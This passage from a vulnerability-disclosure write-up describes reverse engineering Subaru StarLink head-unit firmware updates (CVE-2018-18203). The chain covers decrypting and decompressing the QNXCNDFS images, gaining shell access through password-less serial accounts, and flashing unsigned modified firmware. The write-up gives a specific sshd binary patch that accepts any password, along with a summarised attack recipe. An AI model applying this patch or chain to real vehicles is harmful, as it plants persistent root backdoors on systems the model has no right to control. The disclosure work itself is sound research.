engineered by simply guessing else looking a bit further in the binary. The cdqnx6fs binary is quite compact and doesn't contain many debugging strings. Reverse engineering it will be time consuming, so attempting to guess at the file-format instead of reverse engineering large amounts of filesystem IO code could save time. Cluster Table The cluster table contains a header-configurable number of clusters. I didn't know what clusters were at this point, but an initial guess is something akin to a filesystem block. The header also contains an offset to a table of clusters. The table of clusters looks like this: 00000280 90 0e 00 00 00 00 00 00 e1 e6 00 00 00 00 00 00 |................| 00000290 71 f5 00 00 00 00 00 00 19 1c 00 00 00 00 00 00 |q...............| 000002a0 8a 11 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |................| 000002b0 a3 2d 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |.-..............| Again, we can easily guess what this is with a little intuition. If we assume the first doubleword is a pointer in the existing file and navigate to offset 0x0E90, we get: 00000e50 80 f3 42 05 00 00 00 00 5f 89 07 00 00 00 00 00 |..B....._.......| 00000e60 df 7c 4a 05 00 00 00 00 96 fd 08 00 00 00 00 00 |.|J.............| 00000e70 75 7a 53 05 00 00 00 00 2c 21 06 00 00 00 00 00 |uzS.....,!......| 00000e80 a1 9b 59 05 00 00 00 00 eb 81 04 00 00 00 00 00 |..Y.............| 00000e90 0e 0f 86 ac 0a e5 9c 25 ce 6d 09 ee 9c 58 39 9a |.......%.m...X9.| 00000ea0 97 84 6f 26 5c 8b 03 c2 bf b6 c8 80 11 69 34 10 |..o&\........i4.| 00000eb0 c1 0c 02 5c 01 fa f8 fa 10 65 c2 d3 3b 49 82 14 |...\.....e..;I..| 00000ec0 d6 3c ef ce db 52 5b 11 42 69 6e c3 50 a2 1f af |.<...R[.Bin.P...| 0xe90 is the end of the cluster table (note the change in entropy). The first doubleword is almost certainly an offset into the data section. For the next doubleword, a guess is that it is the size of the cluster data. 0x0e90 + 0xE6E1 = 0xF571. The next cluster entry offset is indeed 0xF571. We now understand the cluster table and the data section. Cluster Data Chunks of cluster data can now be extracted from the data segment using the cluster table. Each chunk looks entirely random and there is no clear metadata in any particular chunk. Using header data, we know that both dat files shipped in this update are both encrypted and compressed. The decryption step will need to happen first using AES256-GCM. Via reverse engineering and searching for strings near the encryption code, it is clear that the cdqnx6fs binary is using mbed tls. The target decryption function is mbedtls_gcm_auth_decrypt . After researching GCM a bit more, we will need the symmetric key, the initialization vector, and an authentication tag to correctly decrypt and verify the buffer. We have a probable symmetric key from the filesystem, but need to find the IV and tag. Again, the code is dense and reverse-engineering the true structure would take quite a bit of time, and I didn't find evidence of a constant IV, so let's guess. If I were designing this, I'd put the IV in the first 16 bytes, the tag in the next 16, then have the encrypted data following that. There aren't too many logical combinations here, so we can switch the IV and tag around, and also try prepending and appending this data. This seemed likely to me. Unfortunately, after plugging in the symmetric key and trying the above process in python, nothing seemed to decrypt correctly. The authentication tags never matched. Thus, we potentially guessed incorrectly on the structure of the encrypted clusters, the algorithm isn't actually AES-GCM (or it was modified), or something else is going on. Before delving into the code, let's search for where the encryption key is passed from installUpdate to cdqnx6fs. The symm.key file seems like an obvious choice for the symmetric key, but maybe that isn't correct. Decrypting How do we locate where the symmetric key is loaded and passed to the new process? Search for the filename and examine all references. There is only one reference, and it is passed to fopen64. A short while after, this value is passed to the cdqnx6fs process. Examine the following code: LOAD:08052ADE 37 48 LDR R0, =aDecrypting ; "Decrypting..." LOAD:08052AE0 FE F7 74 EE BLX puts LOAD:08052AE4 36 4B LDR R3, loc_8052BC0 LOAD:08052AE6 37 49 LDR R1, =(aR+1) ; "r" LOAD:08052AE8 18 68 LDR R0, [R3] ; "/etc/keys/symm.key" LOAD:08052AEA FE F7 68 EA BLX fopen64 LOAD:08052AEE 05 46 MOV R5, R0 LOAD:08052AF0 48 B9 CBNZ R0, loc_8052B06 LOAD:08052AF2 35 4B LDR R3, =(a89abcdefcalcne+8) ; "calcNewSymmKey" LOAD:08052AF4 02 21 MOVS R1, #2 LOAD:08052AF6 0A 46 MOV R2, R1 LOAD:08052AF8 00 93 STR R3, [SP,#0xC0+var_C0] LOAD:08052AFA 32 23 MOVS R3, #0x32 LOAD:08052AFC 01 93 STR R3, [SP,#0xC0+var_BC] LOAD:08052AFE 33 4B LDR R3, =aUnableToOpenSy ; " Unable to open symm key file : %s , %d"... LOAD:08052B00 FE F7 FE EC BLX slog2f LOAD:08052B04 1E E0 B return_err A major hint is the debug error message that happens to print the function name. The function the symmetric key gets loaded in is called calcNewSymmKey, and another debug message prints "Decrypting...". The symmetric key is modified via some form of transformation. Key Generation Back before every app was built with Electron and used around three gigs of RAM to send a tweet, software authors would distribute demos and shareware, which was software that usually had the complete functionality unlocked for a brief time-trial. To unlock it, you would pay the author and get back a code (serial) you could enter into the program. This serial was often tied to hardware specific information or a user-name. If the serial was valid, the program would unlock. There are numerous different ways to get around this. In order of what the "scene" considered most technically impressive and useful back in the day, the best way to bypass software serial schemes was as follows: Key Generator - Reverse engineer the author's serial registration algorithm. Port it to C or well documented, ASM, write a nifty win32 applet that plays mod files and makes your logo spin around, etc. Self-key generation - Modify the binary to print out the real serial number in a text box. Many programs would make the fatal mistake of comparing the true serial with the one the user entered via strcmp. Just change the comparison to a message box display function and exit right after as you probably overwrote some important code. After you get the code, delete the patched version, install the original, and you have an "authentically" registered program. Patching - Bypass the time-limit, always return "Registered", etc. The more patches it took, usually the worse the "crack" was. Reverse engineering the key generation algorithm was always the hardest method. Patching was challenging as it was a cat and mouse game between developers and crackers. Registration functionality would get increasingly complicated to try and obfuscate what was going on. Harman has designed an encryption scheme that is quite similar to early software protection efforts. Emulation Harman's algorithm looks rather simple as the function generating the new key doesn't call into any subroutines, doesn't use any system calls, and is only 120 lines of ARM. The ARM is interesting to look at, but at the end of the day one can statically analyze the entire process without ever leaving the subroutine. But understanding the assembly and converting it to C will take time. What if we could just emulate the algorithm? We're running ARM. The easiest way will be to take the actual assembly and paste it directly into an assembly stub, then call into that from C. After it returns, print the modified memory contents. Cross-compile it, run in QEMU, and done. The idea is to take the Harman transformation code and run it exactly. This isn't quite as easy as copy-and-paste, but it is close. I had to modify a few registers to get this to work. The assembly stub: .syntax unified .section .text .global decrypt .cpu cortex-a9 .thumb decrypt: push {r4-r7, lr} # Code goes here! pop {r4-r7, pc} The C shim: #include <stdio.h> extern char *decrypt(char *, int); #define SALT 0x0 int main() { char symmetric_key[] = "key-was-here"; char *output = decrypt(symmetric_key, SALT); printf("Key is: %s\n", output); return 0; } The Makefile: all: arm-linux-gnueabi-gcc -Wall -pedantic key.c -g algo.s -static -mthumb && qemu-arm -cpu cortex-a9 a.out clean: rm a.out The only other trick to note is that the calcNewSymmKey function takes in one parameter called a salt. Salt is loaded from the very end of the standard ISO header (0x7FDE) and is also printed in some of the build artifacts that are still packaged with the updates. 00007fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 |..............09| 00007fe0 a9 2b 74 10 51 6b 01 46 5b 1a e3 40 dc d1 ec d5 |.+t.Qk.F[..@....| 00007ff0 36 a4 53 0c 23 05 bd 76 ac 60 83 f0 7b 88 79 c5 |6.S.#..v.`..{.y.| 00008000 01 43 44 30 30 31 01 00 57 69 6e 33 32 2f 4d 69 |.CD001..Win32/Mi| The salt fetching code simply converts a two-digit ASCII character array into an integer. salt = 10 * DIGIT1 + DIGIT2 - 0x210; Which is just an expanded version of the "convert a two-digit character array representing an integer number to an integer" algorithm: salt = 10(DIGIT1 - 0x30) + (DIGIT2 - 0x30) After running the key generator with the correct salt, we get a significantly modified symmetric key that decrypts the clusters. Easy as that! I believe the true key generation algorithm can be derived by playing around with the symmetric key and the salt value with the key generator. It appears to be a simple rotation cipher. I will not release the full key generator as it is using Harman's own code. On the plus side, this should cut down on "I flashed a random binary to my head unit and it won't turn on" support e-mails. Cluster Decryption With the new key, the aforementioned guessed decryption scheme works. IV is indeed the first chunk, followed by the authentication tag, followed by the encrypted data. 00000000 04 eb 10 90 00 60 00 01 10 43 00 18 d8 6f 17 00 |.....`...C...o..| 00000010 00 80 fa 31 c0 8e d0 bc 00 20 b8 c0 07 50 b8 36 |...1..... ...P.6| 00000020 01 50 cb 00 2b 81 00 66 90 e9 00 02 8d b4 b7 01 |.P..+..f........| 00000030 39 81 00 ff ff 04 00 93 27 08 00 3d 01 00 04 18 |9.......'..=....| 00000040 00 90 7c 26 b8 00 9b cf d7 01 19 cf 00 0d 0a 51 |..|&...........Q| 00000050 4e 58 20 76 31 2e 32 62 20 42 6f 6f 74 20 4c 6f |NX v1.2b Boot Lo| 00000060 61 64 65 72 57 00 10 55 6e 73 75 70 70 6f 72 74 |aderW..Unsupport| 00000070 65 64 20 42 49 4f 53 52 00 08 52 41 4d 20 45 72 |ed BIOSR..RAM Er| 00000080 72 6f 7e 00 09 44 69 73 6b 20 52 65 61 64 26 12 |ro~..Disk Read&.| 00000090 00 10 4d 69 73 73 69 6e 67 20 4f 53 20 49 6d 61 |..Missing OS Ima| 000000a0 67 65 52 00 07 49 6e 76 61 6c 69 64 29 13 00 29 |geR..Invalid)..)| 000000b0 17 01 06 4d 75 6c 74 69 2d 76 03 03 00 3a 20 5b |...Multi-v...: [| 0x9010eb04 is the tag for a QNX6 filesystem. Some of the strings look slightly corrupted, which is probably explained by the compression. Cluster Decompression If we go back to the binary and look for a hint, we find a great one: LOAD:0805D6D8 41 73 73 65+aAssertionFaile DCB "Assertion failed in %s@%d:e == LZO_E_OK",0 This points us, with almost absolute certainty, to lzo. Take the chunk, pass it to lzo1x_decompress_safe() via C or Python, then get the following error message: lzo.error: Compressed data violation -6 So, this isn't miniLZO? This part stumped me for a few hours as lzo1x is by far the most commonly used compression function used from the LZO library. The LZO library does provide many other options that are benchmarked in the LZO documentation — i.e., there's also LZO1, LZO1A, LZO1B, LZO1C, LZO1F, LZO1Y, etc. lzo1x is packaged inside of miniLZO, and is recommended as the best, hence seems to be almost the only algorithm ever used as far as I am aware. From the LZO documentation: My experiments have shown that LZO1B is good with a large blocksize or with very redundant data, LZO1F is good with a small blocksize or with binary data and that LZO1X is often the best choice of all. LZO1Y and LZO1Z are almost identical to LZO1X - they can achieve a better compression ratio on some files. Beware, your mileage may vary. I tested most of the algorithms, and only one worked: lzo1c_decompress_safe. So, why was lzo1c used? I have absolutely no idea. My guess is someone was bored one day and benchmarked several of the lzo algorithms for QNXCNDFS, or someone thought this would make it difficult to recover the actual data. This just makes decryption an annoyance as every upstream lzo package usually only implements the lzo1x algorithm. Mounting the Image After all of this, we can now decrypt and decompress all of the chunks. Concatenating the result of this gives us a binary blob that looks quite like a QNX6 filesystem. The Linux kernel can be built to mount QNX6 filesystem as read-only thanks to the work of Kai Bankett. However, if we try to mount the concatenated image, we get a superblock error. $ sudo mount -t qnx6 -o loop system.dat.dec.noextent mnt mount: /home/work/workspace/mnt: wrong fs type, bad option, bad superblock on /dev/loop7, missing codepage or helper program, or other error. The kernel module reports: [ 567.260015] qnx6: unable to read the second superblock On top of all of this, some of the header fields do not appear to match up with what we expect: raw size (dword header offset: 0x10) does not match the file size of our decrypted and decompressed blob. This almost certainly has to do with the previously ignored extents section of the QNXCNDFS file. The Extents Section Most of the QNXCNDFS file is now understood, with one exception: the extents section. 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| Low entropy again, so we can try guessing. We know the size and start of the extents section from the header. We know there are four "extents" (again from the header), hence the above is almost certainly four sets of four dwords. Searching the binary for useful strings isn't too productive. Two fields are named, but no other hints: LOAD:0805DD8C 41 73 73 65+aAssertionFaile_1 DCB "Assertion failed in %s@%d:cpos == xtnt->clstr0_pos",0 ... LOAD:0805DE2C 41 73 73 65+aAssertionFaile_2 DCB "Assertion failed in %s@%d:offset == xtnt->clstr0_off",0 So, one field may be a cluster position, the other may be some form of cluster offset. There seem to be some patterns in the data. If we assume the first dword is an address and the second dword is a length, the results look good. Extent at 0x200: Write Address: 0x00000000, Write Size: 0x00002000 Extent at 0x220: Write Address: 0x00002000, Write Size: 0x00000200 Extent at 0x240: Write Address: 0x00003000, Write Size: 0x0C078000 Extent at 0x260: Write Address: 0x3FFFB000, Write Size: 0x00000200 Adding up the write sizes gives us 0xC07A400, which matches the header field for "raw data bytes" of the file. These don't line up perfectly. The first and second extent makes sense — write address 0 + write size 0 = write address 1. What do the third and fourth dword represent? Clusters are likely involved, in fact, the third dword does point to offsets that line up with cluster table entries. Dword four is a bit mysterious. To solve this, understanding the QNX6 superblock structure is helpful. Understanding the Extents There's a well written write-up of the QNX6 filesystem structure done by the same individual that implemented the driver in the Linux kernel. Summarizing the useful parts, there are two superblocks in the filesystem images. One is near the beginning and one is near the end. Debugging the kernel module indicates that the first superblock is correct and validating, while the second is missing or invalid. Manually calculating the second superblock address via following the source code gets us this: //Blocksize is 1024 (0x400) //num_blocks = 0xFFFE0 //bootblock offset = #define QNX6_BOOTBLOCK_SIZE 0x2000 #define QNX6_SUPERBLOCK_AREA 0x1000 /* calculate second superblock blocknumber */ offset = fs32_to_cpu(sbi, sb1->sb_num_blocks) + (bootblock_offset >> s->s_blocksize_bits) + (QNX6_SUPERBLOCK_AREA >> s->s_blocksize_bits); So: 0xFFFE0 + (0x2000 >> 10) + (0x1000 >> 10) * 1024 block size is offset: (0xFFFE0 + 8 + 4) * 1024 = 0x3FFFB000 Note that the calculated second superblock address is the same as the last extent write address. At this point, it became clear to me that the extents section is just used to "compress" large runs of zeros. The last extent is skipping a large chunk of memory and then writing out the superblock from the end of the last cluster. Thus, we can process the extents like this: aa aa aa aa 00 00 00 00 bb bb bb bb 00 00 00 00 cc cc cc cc 00 00 00 00 dd dd dd dd 00 00 00 00 At offset 0xaaaaaaaa, write 0xbbbbbbbb bytes from offset 0xdddddddd into the cluster pointed to by cluster table entry 0xcccccccc. Or, a real example: 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| mmap a 0 set file of header field "raw size" bytes. At offset 0x00000000, write 0x00002000 bytes from an offset of 0x00000000 into the cluster pointed to by table entry 0x0280. At offset 0x00002000, write 0x00000200 bytes from an offset of 0x00002000 into the cluster pointed to by table entry 0x0280. At offset 0x00003000, write 0x0c078000 bytes from an offset of 0x00002200 into the cluster pointed to by table entry 0x0280. At offset 0x3fffb000, write 0x00000200 bytes from an offset of 0x07a20000 into the cluster pointed to by table entry 0x0e80. As the 0x0c078000 byte write runs off the end of first cluster, the correct behavior is to jump to the next cluster in the table and continue reading. This simplifies the extents section. Final Decompression With this, we know enough to completely decompress the encrypted and compressed QNXCNDFS files and successfully mount them through the Linux QNX6 driver. This was all done via static analysis. See qdecant for a rough implementation of this, but do note that you'll have to compile your own python lzo module with one function call change for this to work. This was a quick, and woefully inefficient, script to get the files dumped as soon as possible. I would have improved it further, but you'll see why I didn't subsequently. system.dat Here's a small sample of the files and directories inside of system.dat: ./bin ... ./bin/bt_test ./bin/iocupdate ./bin/awk ./bin/display_image ./bin/gles1-gears ./bin/screenshot ... ./lib ./lib/libQt53DLogic.so.5 ... ./lib/libQt53DQuick.so.5 ./etc ./etc/resolv.conf ./etc/licenseAgreement.txt ./etc/openSourceLicenses.txt ./etc/options.connmgr ./app/usr/share/prompts/waveFiles/4CH ... ./app/usr/share/trace/UISpeechService.hbtc ./app/etc/wicome/DbVersion.txt ... ./app/etc/wicome/SCP.rnf ./app/etc/speech/AudioConfig.txt ./app/share/updatestrings.json ./app/wicome ./usr ./usr/var ./usr/var/DialogManager ./usr/var/DialogManager/DynamicUserDataGrammar ./usr/var/UISS ./usr/var/UISS/speechTEFiles/sat ./dialogManager/dialog/grammar/en_US/grammarHouseBackward.fcf ... ./ifs_images ./ifs_images/sys1.ifs ./ifs_images/core1.ifs ./ifs_images/hmi1.ifs ./ifs_images/second1.ifs ./ifs_images/third1.ifs Far less than I imagined. Plenty of duplicated files we already had access to from the ISO file. The interesting find are the new ifs files at the bottom. ifs_images There are plenty of more files in the system.dat ifs images. It is always fun to look around system internals. Here are a few interesting findings: tr.cpp - Some sort of build artifact. Has something to do with mapping fonts or translation strings to the UI I believe. Hints at a dealer, factory, and engineering mode. I believe dealer and factory can be triggered with known button combinations. I am unsure how to get into engineering mode or what it even contains. "FACTORY_MODE"<<"DEALER_MODE"<<"ENGINEERING_MODE"; CarplayService.cfg - Apple apparently recommends that head units supporting Carplay not inject their own UI/functionality on top of or next to Carplay. Well done Apple and Subaru, that's always annoying. "Screen_Width": 800, /* March-02-2016: The Apple Spec recommended is slightly changed here as per discussion with Apple [during demo over webex] and they suggested the carplay screen to occupy full screen of HU removing the status bar [maserati icon]*/ Internal document — Found an older Microsoft Office document with what looks like company internal details (serial numbers) on various components. Mentions a number of cars in the Subaru lineup then a codename for some sort of new Subaru North American vehicle. This is from 2016, so I'd guess that vehicle has already been announced by now. On the bright side, it didn't look very sensitive. Overall, there was lots of stuff, but no obvious code execution mechanisms found in the brief search. I was hoping for a script that loaded code from the USB drives, some form of debugging mode with peek/poke, or anything useful. There are enough files here where I could probably keep exploring and find an avenue, but let's revisit the serial port for now. Back to QNXCNDFS Most of the QNXCNDFS structure is understood. Nowhere during the reverse engineering process did I find any signatures, signature verification code, or strings indicating some form of signature check taking place. However, being able to prove that there isn't a signature check is difficult through reverse engineering alone. The easiest way to prove this would be to generate our own custom QNXCNDFS image, overwrite one in the update file, and try to flash it down. It it works, great; if not, we'll probably get a new error message that will point us to another signature check we missed. As we understand the file structure, we could work backwards and create a tool to compress a QNX6 filesystem image into a QNXCNDFS file. But we also know that the cndfs application looks to support creating QNXCNDFS files, so if we already had code-execution, we could just use that tool to create our images and skip the time-consuming step of trying to generate valid QNXCNDFS files from scratch. Both are viable options, but let's look for more flaws first. The Shadow File Here's the shadow file with the hashes replaced. root:@S@aaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@ccccc@e0a3f6794d650876:1420137227:0:0 Three passwords I failed to crack. Here's passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: Important notes about passwd here, from the QNX manual: If the has_passwd field contains an x character, a password has been defined for this user. If no character is present, no password has been defined. and The initial_command field contains the initial command to run after the user has successfully logged in. This command and any arguments it takes must be separated by tab or space characters. As the command is spawned directly (not run by a shell), no shell expansions is performed. There is no mechanism for specifying command-line arguments that contain space or tab characters themselves. (Quoting isn't supported.) If no initial_command is specified, /bin/sh is used. So, we can potentially login over serial to daemon and dm. They have no password defined, and no initial command specified, which implies /bin/sh will be the command. Does this work? Non-privileged Code Execution Absolutely. $ ls sh: ls: cannot execute - No such file or directory $ echo $PATH :/proc/boot:/bin:/usr/sbin:/fs/core1/core1/bin:/fs/sys1/sys1/bin:/fs/core/hmi:/fs/second1/second1/bin:/fs/third1/third1/bin:/sbin:/fs/system/bin $ cd /fs/system/bin $ echo * HBFileUpload NmeCmdLine antiReadDisturbService awk bt_test cat cdqnx6fs changeIOC chkdosfs chkfsys chkqnx6fs chmod cp cypress_ctrl date dbus-send dbustracemonitor dd devb-umass devc-serusb display_image emmcvuc fdisk fs-cifs fsysinfo gles1-gears grep hd hmiHardControlReceiver hogs inetd inject iocupdate isodigest ls mediaOneTestCLI mkdir mkdosfs mkqnx6fs mtouch_inject mv netstat pcm_logger pfctl pidin ping pppd qdbc rm screenshot showmem slog2info softwareUpdate sshd sync telematicsService telnetd testTimeshift top tracelogger ulink_ctrl use watchdog-server which $ ./cdqnx6fs sh: ./cdqnx6fs: cannot execute - Permission denied Unfortunately, nearly ever binary is locked down to the root user. We can only navigate around via cd and dump directory contents with echo *. The good news is that when the system mounts a FAT32 USB drive, it marks every binary as 777. Thus, glob every binary we've extracted thus far into a folder on a flash drive, insert it into the head unit USB adapter, connect to dm or daemon via serial, set your $PATH to include the aforementioned folder, and then type ls. $ ls -las / total 201952 1 lrwxrwxrwx 1 root root 28 Jan 01 00:02 HBpersistence -> /fs/data/app/usr/share/trace 1 drwxr-xr-x 2 root root 30 May 25 2017 bin 1 drwxr-xr-x 2 root root 10 May 25 2017 dev 1 drwxr-xr-x 2 root root 20 May 25 2017 etc 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 fs 1 dr-xr-x--- 2 root 73 10 Dec 31 1969 home 0 drwxrwxr-x 8 root root 0 Jan 01 00:01 pps 201944 dr-xr-xr-x 2 root root 103395328 Jan 01 00:02 proc 1 dr-xr-x--- 2 root upd 10 Dec 31 1969 sbin 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 srv 1 lrwxrwxrwx 1 root root 10 May 25 2017 tmp -> /dev/shmem 1 drwxr-xr-x 2 root root 10 May 25 2017 usr Local code execution via serial. We can now execute every binary that doesn't require any sort of enhanced privileges. cdqnx6fs is one of them. $ ./cdqnx6fs ---help cdqnx6fs - condense / restore Power-Safe (QNX6) file-systems cdqnx6fs -c [(general-option | condense-option)...] src dst cdqnx6fs -r [(general-option | restore-option)...] src dst I wish I could provide some sage advice on how I solved this but it just comes down to experience. Do it enough and patterns will emerge. Image Creation Assuming cdqnx6fs works, we can now extract the system.dat (using the -r flag), mount the extracted QNX6 image in a system that supports read/write operations, modify the image in some way, flash it back down, and see if it works. If the image truly isn't signed or the verification code is broken, the flashing step will succeed. To modify the QNX6 images, we can't use the Linux driver as that only supports reading. We'll have to use an official QNX 6 test VM for full QNX6 filesystem IO. Extract the image, mount the image, add a test file in a known directory, unmount the image, transfer it back to the Harman head unit, repackage it using the correct encryption key, replace the file into the update package, flash it down, pray. The install succeeds and we can find the new file via serial. The system effectively runs unsigned code and the only "protection" against this is what looks to be an easily reverse engineered cipher. Root Escalation We can now modify system files, but the next question is, what files should we modify for root code execution? Keep in mind that the shadow file and various SSH keys are in the IFS binary blobs. So, while the best root method may be replacing the root password, that would involve more reverse engineering. We don't know the IFS file structure, and at this point, diving into yet another binary blob black box format doesn't sound enjoyable. (Someone else do it.) There are a large number of files not in the IFS images, but none of them are shell scripts or any sort of obvious startup script we can modify. Our options are mostly all system binaries. There are an infinite number of ways to gain (network) code execution by replacing binaries, but I'll stick with what I thought of first. Let's backdoor SSH to always log us in even if the password is incorrect. Backdooring SSH You'd think this part would just be a web search away. Unfortunately, searching for "backdooring ssh" leads to some pretty useless parts of the Internet. Pull the source for the version of OpenSSH running on the system — it's 5.9 (check strings and you'll see OpenSSH_5.9 QNX_Secure_Shell-20120127). Browse around, try to understand the authentication process, and target a location for a patch. There were a few locations that looked good, but I started here in auth2-passwd.c: Here's userauth_passwd: static int userauth_passwd(Authctxt *authctxt) { char *password, *newpass; int authenticated = 0; int change; u_int len, newlen; change = packet_get_char(); password = packet_get_string(&len); if (change) { /* discard new password from packet */ newpass = packet_get_string(&newlen); memset(newpass, 0, newlen); xfree(newpass); } packet_check_eom(); if (change) logit("password change not supported"); else if (PRIVSEP(auth_password(authctxt, password)) == 1) authenticated = 1; memset(password, 0, len); xfree(password); return authenticated; } The patch should be straight forward. Instead of returning authenticated = 0 on failure, always return authenticated = 1. Find this location in the binary by matching strings: .text:080527E6 .text:080527E6 loc_80527E6 ; CODE XREF: sub_805279C+38↑j .text:080527E6 CBZ R6, loc_80527F2 .text:080527E8 LDR R0, =aPasswordChange_0 ; "password change not supported" .text:080527EA MOVS R5, #0 .text:080527EC BL sub_806CC94 .text:080527F0 B loc_805280E .text:080527F2 ; --------------------------------------------------------------------------- .text:080527F2 .text:080527F2 loc_80527F2 ; CODE XREF: sub_805279C:loc_80527E6↑j .text:080527F2 LDR R3, =dword_808A758 .text:080527F4 MOV R0, R5 .text:080527F6 MOV R1, R4 .text:080527F8 LDR R3, [R3] .text:080527FA CBZ R3, loc_8052802 .text:080527FC BL sub_8056A18 .text:08052800 B loc_8052806 .text:08052802 ; --------------------------------------------------------------------------- .text:08052802 .text:08052802 loc_8052802 ; CODE XREF: sub_805279C+5E↑j .text:08052802 BL sub_8050778 .text:08052806 .text:08052806 loc_8052806 ; CODE XREF: sub_805279C+64↑j .text:08052806 SUBS R3, R0, #1 .text:08052808 NEGS R0, R3 .text:0805280A ADCS R0, R3 .text:0805280C MOV R5, R0 .text:0805280E .text:0805280E loc_805280E ; CODE XREF: sub_805279C+54↑j .text:0805280E MOVS R1, #0 ; c .text:08052810 LDR R2, [SP,#0x28+var_24] ; n .text:08052812 MOV R0, R4 ; s .text:08052814 BLX memset .text:08052818 MOV R0, R4 .text:0805281A BL sub_8072DB0 .text:0805281E LDR R3, =__stack_chk_guard .text:08052820 LDR R2, [SP,#0x28+var_1C] .text:08052822 MOV R0, R5 .text:08052824 LDR R3, [R3] .text:08052826 CMP R2, R3 .text:08052828 BEQ loc_805282E .text:0805282A BLX __stack_chk_fail .text:0805282E ; --------------------------------------------------------------------------- .text:0805282E .text:0805282E loc_805282E ; CODE XREF: sub_805279C+8C↑j .text:0805282E ADD SP, SP, #0x14 .text:08052830 POP {R4-R7,PC} R0 is our return value in ARM, and will contain the value of authenticated on subroutine exit. The write to R0 is: .text:08052822 28 46 MOV R0, R5 Change this to return authenticated = 1;, which is going to be this in ASM: .text:08052822 01 20 MOVS R0, #1 Thus, 28 46 -> 01 20. Not the best backdoor possible, but it works. $ ssh root@192.168.0.1 ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. ********************************************************************* root@192.168.0.1's password: # uname -a QNX localhost 6.6.0 2016/09/07-09:25:33CDT i.MX6S_Subaru_Gen3_ED2_Board armle # cat /etc/shadow root:@S@aaaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@cccccc@e0a3f6794d650876:1420137227:0:0 # pidin -F "%n %U %V %W %X %Y %Z" | grep sh usr/sbin/sshd 0 0 0 0 0 0 usr/sbin/sshd 0 0 0 0 0 0 bin/sh 0 0 0 0 0 0 Putting it All Together To root any 2017+ Subaru StarLink head unit, an attacker needs the following to generate valid update images: A Subaru head unit with serial and USB port access. The encryption keys for the update files. An official update. These seem to be available for most platforms in many different ways. Without the official update, the ISO signature check will fail and the install will not continue to the stage where the QNXCNDFS files are written. Physical access to the vehicles USB ports. Technically, the head unit isn't needed, but to replace it you'd need code to generate QNXCNDFS images from QNX6 filesystem images. After we have those pieces: Use the serial and USB ports to gain local code execution on the system. Decondense an official software update QNXCNDFS image. Use the QNX Platform VM Image to modify the QNX6 filesystem. Inject some form of backdoor — sshd in this case. Re-package the update file via cndfs. Replace the modified QNXCNDFS file in the official system update. Install. While this may seem like an execessive number of steps to gain code execution, keep in mind an attacker would only need to do this once and then could conceivably generate valid updates for other platforms. Valid update images were initially challenging to find, but it appears that Subaru is now releasing these via a map-update application that can be used if you have a valid VIN. I will not be releasing modified update files and I wouldn't recommend doing this to your own car. CVE-2018-18203 A vulnerability in the update mechanism of Subaru StarLink head units 2017, 2018, and 2019 may give an attacker (with physical access to the vehicle's USB ports) the ability to rewrite the firmware of the head unit. This vulnerability is due to bugs in the signature checking implementation used when verifying specific update files. An attacker could potentially install persistent malicious head unit firmware and execute arbitrary code as the root user. Next Steps After all of this, I still know very little about the Harman head unit system, but I do know how to root them. Reverse engineering QNXCNDFS wasn't required, but was an interesting avenue to explore and may help other researchers in the future. The next step is far less tedious than reversing filesystem containers — explore the system, see what hidden functionality exists (Andromeda is probably a goldmine, map out dbus), setup a cross-compiler, and so on. Notes from Subaru and Harman Both Subaru and Harman wanted to relay messages about the flaw in this write-up. I have paraphrased them below. If you have questions, please contact either Subaru or Harman directly. Note from Subaru Subaru will have updates for head units affected by this flaw in the coming weeks. Note from Harman The firmware update process attempted to verify the authenticity of the QNXCNDFS dat files. The procedure in question had a bug in it that caused unsigned images to verify as "valid", which allowed for unsigned code installation. Conclusion I started this in my free time in July of 2018 and finished early the next month. Overall, the process took less than 100 hours. The embargo was originally scheduled for 90 days, which would have been November 5th, 2018. Subaru requested more time before the original embargo ended and I agreed to extend it until the end of November. I was unable to find any sort of responsible/coordinated disclosure form on Harman or Subaru's websites. That was disappointing as Harman seems to have plenty of sales pages detailing their security programs and systems. I did managed to find a Harman security engineer on LinkedIn who did an excellent job handling the incident. Thank you! Harman and Subaru should not assume that the biggest flaw is releasing update files. Letting customers update their own head units is wonderful, and it lets security researchers find flaws and report them. Giving the updates exclusively to dealers prevents the good guys from finding bugs. Nation states and organized crime would certainly not have trouble gaining access to firmware and software updates. If anyone affiliated with education or some other useful endeavor would like the head unit, I'll be happy to ship it assuming you pay the shipping costs and agree to never install this in a vehicle. Thank you to those I worked with at Harman, especially Josiah Bruner, and to Subaru for making a great car. Questions, comments, complaints? github.scott@gmail.com Sursa: 